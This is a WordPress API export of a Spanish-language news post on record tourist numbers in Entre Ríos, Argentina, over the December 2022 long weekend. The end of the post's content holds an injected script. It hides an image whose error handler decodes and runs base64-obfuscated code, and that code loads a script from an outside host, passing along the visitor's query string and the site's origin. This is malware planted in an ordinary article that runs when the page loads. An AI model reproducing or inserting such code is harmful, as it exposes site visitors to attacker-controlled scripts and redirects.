{"id":6102,"date":"2022-12-16T11:24:49","date_gmt":"2022-12-16T14:24:49","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=6102"},"modified":"2025-08-13T16:08:54","modified_gmt":"2025-08-13T19:08:54","slug":"con-gran-movimiento-turistico-entre-rios-cierra-el-ano-con-cifras-records","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=6102","title":{"rendered":"Con gran movimiento tur\u00edstico, Entre R\u00edos cierra el a\u00f1o con cifras r\u00e9cords"},"content":{"rendered":"\n<h4 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\"><em><strong>Con un promedio a nivel provincial en torno al 90 por ciento de la ocupaci\u00f3n de alojamiento, el movimiento tur\u00edstico en este fin de semana extra largo fue muy positivo. Se estima que la provincia recibi\u00f3 alrededor de 180 mil visitantes que generaron 1,9 mil millones de pesos en ingresos.<\/strong><\/em><\/h4>\n\n\n\n<p>Seg\u00fan datos de la Secretar\u00eda de Turismo de Entre R\u00edos aportados por los municipios y el sector privado, hubo un intenso movimiento en los destinos con m\u00e1s plazas hoteleras como Col\u00f3n, Federaci\u00f3n y Gualeguaych\u00fa, lo mismo que Paran\u00e1 y Concordia que programaron varias actividades. Los destinos tur\u00edsticos provinciales emergentes tambi\u00e9n tuvieron una gran afluencia de visitantes. Este fin de semana la mayor\u00eda de las ciudades entrerrianas habilitaron sus temporadas, playas y balnearios.<\/p>\n\n\n\n<p>Desde el jueves 8 de diciembre, d\u00eda de la Inmaculada Concepci\u00f3n de Mar\u00eda, hasta el domingo 11, con el viernes convertido en feriado puente, los argentinos disfrutaron de cuatro d\u00edas de descanso, ideales para una escapada tur\u00edstica.<\/p>\n\n\n\n<p>El intenso calor anunciado pareci\u00f3 facilitar el traslado masivo sobre todo de las grandes ciudades a los destinos cercanos con opciones para refrescarse, y que el transcurso del Mundial de F\u00fatbol o las tormentas aisladas anunciadas no lograron mermar. En la provincia, la ocupaci\u00f3n trep\u00f3 entre un 5 y un 10 por ciento respecto a las reservas hasta el d\u00eda 7 de diciembre, de acuerdo a lo relevado desde el sector p\u00fablico y privado.<\/p>\n\n\n\n<p><strong>Ingresos terrestres<br><\/strong>Seg\u00fan informaron de la Polic\u00eda de Entre R\u00edos, el ingreso terrestre a la provincia por cuatro de los accesos fue incesante desde el mi\u00e9rcoles 7 de diciembre por la tarde, y jueves durante todo el d\u00eda, esperando que el mayor tr\u00e1nsito de egresos se concentre el domingo por la tarde, ya que en este sentido no son escalonados, como s\u00ed los ingresos. En los tres accesos internacionales a Entre R\u00edos tambi\u00e9n se verific\u00f3 un gran movimiento. Los datos aportados por la Direcci\u00f3n de Prevenci\u00f3n y Seguridad Vial de la provincia revelan que desde el jueves al domingo ingresaron 82.202 veh\u00edculos por cuatro rutas de acceso: 34.163 por Z\u00e1rate Brazo Largo, 18.340 por el enlace vial Rosario \u2013 Victoria, 17.279 por el puesto Caminero del T\u00fanel Subfluvial, y 12.420 desde el norte por Paso Cerrito en la Autov\u00eda 14.<\/p>\n\n\n\n<p><strong>Destinos y propuestas<br><\/strong>Los destinos entrerrianos debieron trabajar con vigor para recibir a la gran cantidad de turistas que llegaron este fin de semana, como antesala a la temporada de verano. La ciudad de Col\u00f3n inaugur\u00f3 sus balnearios desde Playa Inkier sobre el r\u00edo Uruguay, con una Caravana Tur\u00edstica hasta el Complejo Termal y el Parque Quir\u00f3s. Adem\u00e1s cont\u00f3 con visitas teatralizadas en el Molino Forclaz y la organizaci\u00f3n del Pre Artesan\u00eda, entre otras actividades. Federaci\u00f3n tuvo un fuerte ingreso de visitantes al Complejo Termal, que d\u00edas previos hab\u00eda contabilizado los 700 mil tickets en lo que va del a\u00f1o, agasajando a un turista de Montevideo, y marcando un r\u00e9cord anual, adem\u00e1s de gran asistencia en su Parque Acu\u00e1tico y en las playas sobre el lago.<\/p>\n\n\n\n<p>Gualeguaych\u00fa tuvo un gran movimiento sobre los balnearios del r\u00edo hom\u00f3nimo, y en el \u00d1andubaysal sobre el r\u00edo Uruguay, adem\u00e1s de gran cantidad de visitantes a las Termas de Guaych\u00fa. El Observatorio de Turismo local aport\u00f3 datos sobre el pernocte promedio de los turistas que fue de 3 noches, constat\u00f3 una elevada ocupaci\u00f3n en complejos con spa, hoteles intermedios y el complejo All Inclusive de la localidad, y sobre la procedencia de los turistas, siendo del 52 por ciento de provincia de Buenos Aires incluyendo el \u00e1rea metropolitana de CABA, cerca del 25 por ciento de CABA, el 13,5 por ciento fueron turistas orientales (Uruguay), y entrerrianos del 5 por ciento.<\/p>\n\n\n\n<p>Paran\u00e1 coordin\u00f3 una interesante y variada agenda entre el Municipio y el sector privado a trav\u00e9s del Empatur, con una Convenci\u00f3n Internacional de Tatuadores, la Feria Navide\u00f1a en el Parque Urquiza, torneos de pesca y de billar, recorridos en bus turitico, bicicletas p\u00fablicas en la Costanera, y visitas al Islote Curup\u00ed. Como noticia refrescante se habilit\u00f3 el ingreso a las aguas del r\u00edo Paran\u00e1 en los balnearios Parque y Bajada Grande, para el disfrute de locales y turistas, en el marco de recuperaci\u00f3n de plazas, playas, parques y paseos.<\/p>\n\n\n\n<p>Concordia, vivi\u00f3 el transcurso de la 45\u00b0 Fiesta Nacional de la Citricultura, y una intensa llegada de turistas a sus complejos termales. Seg\u00fan datos del Monitor Tur\u00edstico Inteligente de la ciudad, se pudo conocer el perfil del visitante, que entre otros aspectos revel\u00f3 que el 61 por ciento de los turistas procedieron de Buenos Aires, el 19 por ciento de Santa Fe, el 7 por ciento de Entre R\u00edos, y el 5 por ciento de Corrientes, adem\u00e1s permiti\u00f3 saber que el 48 por ciento viaja en familia, el 35 por ciento en pareja, y el 17 por ciento con amigos, adem\u00e1s de dar a conocer que el destino tuvo un movimiento econ\u00f3mico de 38 millones de pesos.<\/p>\n\n\n\n<p>Sobre el Corredor del Uruguay, la mayor\u00eda de los destinos vivieron el fin de semana largo con alta ocupaci\u00f3n de alojamientos. San Jos\u00e9 recibi\u00f3 la visita de gran cantidad de turistas, con 8.880 entradas al Parque Termal reinagurado recientemente y al Balneario Municipal hasta el d\u00eda s\u00e1bado, constatando que la gran mayor\u00eda fueron visitantes provenientes de provincia de Buenos Aires, Santa Fe, Entre R\u00edos y CABA. Tambi\u00e9n en la Regi\u00f3n Tur\u00edstica Tierra de Palmares, Pueblo Liebig obtuvo un alto porcentaje de ocupaci\u00f3n en sus establecimientos homologados, Villa Elisa tuvo un fuerte movimiento en su Complejo Termal, incluyendo sus distintas opciones de alojamiento, piscinas, spa y golf. Ubajay como localidad cercana al Parque Nacional El Palmar y San Salvador con la Feria Navide\u00f1a, la Muestra anual de la Orquesta Municipal, y la prueba atl\u00e9tica por el 133 aniversario, contaron con gran cantidad de visitantes.<\/p>\n\n\n\n<p>Concepci\u00f3n del Uruguay dej\u00f3 formalmente inaugurada la temporada en las playas de la Isla del Puerto, adem\u00e1s cont\u00f3 con visitas hist\u00f3ricas al Colegio del Uruguay, y en sus cercan\u00edas visitas al Palacio San Jos\u00e9, con la tem\u00e1tica este fin de semana de conocer particularmente el Parque del Lago, en una recorrido denominado Mi Recreo. En Santa Anita transcurri\u00f3 la Fiesta Nacional de la Trilla Tradicional, con coloridas actividades entre ellas la vuelta del Chopp por las calles de la localidad. En Caseros se organiz\u00f3 el Encuentro Cervecero Birra Fest.<\/p>\n\n\n\n<p>Hacia el sur del Corredor del Uruguay, Pueblo Belgrano, localidad vecina a Gualeguaych\u00fa, tambi\u00e9n habilit\u00f3 su temporada, y festej\u00f3 sus j\u00f3venes 39 a\u00f1os. Villa Paranacito e Ibicuy contaron con buena llegada de turistas, alta ocupaci\u00f3n en sus complejos de caba\u00f1as y bungalows, y salidas de pesca. Cercano a Concordia, Puerto Yeru\u00e1 cont\u00f3 con gran cantidad de visitantes durante todo el fin de semana largo. En el extremo norte del Corredor, Santa Ana tuvo gran movimiento tur\u00edstico en su playa, Villa del Rosario organiz\u00f3 visitas a su Museo y Chajar\u00ed tuvo gran cantidad de asistentes en su Complejo Termal.<\/p>\n\n\n\n<p>En el centro de la provincia, Gualeguay cont\u00f3 con la Feria Cervecera, con la actuaci\u00f3n de Kapanga y Turf, el Festival Internacional de Tango, y la Fiesta del Pat\u00ed entrerriano con devoluci\u00f3n. En el Corredor Central, tambi\u00e9n Rosario del Tala, Villaguay, Basavilbaso, Nogoy\u00e1, Villa Dominguez, Villa Clara, Federal y Feliciano, contaron con actividades programadas y llegada de visitantes.<\/p>\n\n\n\n<p>En la costa del Paran\u00e1, sus playas agrestes entre barrancas y selvas en galer\u00edas, tuvieron mayormente su inicio de temporada. En Valle Mar\u00eda se inaugur\u00f3 la temporada de verano en el Balneario Camping Municipal, con fiesta en el predio del Puente el jueves 8. Santa Elena prepar\u00f3 la Feria Manos Santaelenenses, salidas de pesca, y tirolesa en polo aventura. Mar\u00eda Grande tuvo un muy buen movimiento tur\u00edstico en sus dos grandes complejos tur\u00edsticos como Interlagos y las Termas. Hasenkamp realiz\u00f3 una Gran Fiesta de Lanzamiento de sus Carnavales el d\u00eda viernes 9, evento que comenzar\u00e1 el pr\u00f3ximo 14 de enero. La Paz, Diamante, el Parque Nacional Pre Delta, Victoria, Las Cuevas, el circuito de Aldeas Alemanas, Piedras Blancas, Villa Urquiza, Hernandarias, entre otros destinos y atractivos, tambi\u00e9n tuvieron actividades programadas y un intenso movimiento.<br>Si bien las jornadas fueron soleadas y calurosas en toda la provincia de Entre R\u00edos, lo que permiti\u00f3 la realizaci\u00f3n de las actividades programadas y la visita masiva a playas, balnearios, parques acu\u00e1ticos, parques termales y complejos de piscinas, el viernes por la noche en algunos puntos de la provincia las tormentas obligaron a reprogramar algunas actividades previstas.<\/p>\n\n\n\n<p><strong>Entre R\u00edos y el pa\u00eds<br><\/strong>A nivel nacional el movimiento tur\u00edstico tambi\u00e9n fue masivo, tanto a destinos cercanos a los grandes centros emisores como la Costa Atl\u00e1ntica, los valles cordobeses o los corredores entrerrianos, como a los destinos lejanos de Patagonia, Cuyo, Noroeste o Cataratas, seg\u00fan los datos relevados por el Ministerio de Turismo y Deportes de la Naci\u00f3n a trav\u00e9s del Observatorio argentino de turismo, y lo difundido por la C\u00e1mara Argentina de Turismo \u2013 CAT. Al respecto, el Ministro de la Cartera Nacional Mat\u00edas Lammens opin\u00f3 que \u201cEste fin de semana de diciembre est\u00e1 cerrando un a\u00f1o maravilloso para la industria del turismo y anticipa una temporada de verano que volver\u00e1 a tener cifras de movimiento muy elevadas. El turismo fue, durante todo el a\u00f1o, motor del crecimiento de la econom\u00eda y del empleo a lo largo y ancho del pa\u00eds\u201d, asegur\u00f3.<\/p>\n\n\n\n<p>En el orden provincial, el Gobernador Gustavo Bordet mencion\u00f3 que \u201cEl calor nos augura que ser\u00e1 una temporada con much\u00edsimo \u00e9xito la que tenemos por delante, para lo que resta del a\u00f1o y fundamentalmente para el 2023\u201d, asegur\u00f3 el mandatario durante el acto de inauguraci\u00f3n de la temporada tur\u00edstica en Entre R\u00edos, que se desarroll\u00f3 en las termas de la ciudad de San Jos\u00e9. Manifest\u00f3 tambi\u00e9n que en la inauguraci\u00f3n de la temporada anterior, junto a la vicegobernadora Laura Stratta se propusieron \u201cel cometido de que nos visiten 5 millones de turistas\u201d. Apunt\u00f3 que \u201cparec\u00eda dif\u00edcil\u201d pero inform\u00f3 que a Entre R\u00edos en este a\u00f1o finalizado diciembre \u201cingresar\u00e1n 5.800.000 turistas\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/noticias.entrerios.gov.ar\/notas\/con-gran-movimiento-turstico-entre-ros-cierra-el-ao-con-cifras-rcords.htm\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/10\/Captura-web_14-10-2022_113842_noticias.entrerios.gov_.ar_.jpeg\" alt=\"\" class=\"wp-image-5899\" width=\"257\" height=\"71\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con un promedio a nivel provincial en torno al 90 por ciento de la ocupaci\u00f3n de alojamiento, el movimiento tur\u00edstico en este fin de semana extra largo fue muy positivo. Se estima que la provincia recibi\u00f3 alrededor de 180 mil visitantes que generaron 1,9 mil millones de pesos en ingresos. Seg\u00fan datos de la Secretar\u00eda [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":6103,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[28],"tags":[],"class_list":["post-6102","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-portales-de-servicios-e-informacion"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6102","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6102"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6102\/revisions"}],"predecessor-version":[{"id":10524,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6102\/revisions\/10524"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/6103"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6102"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6102"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6102"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}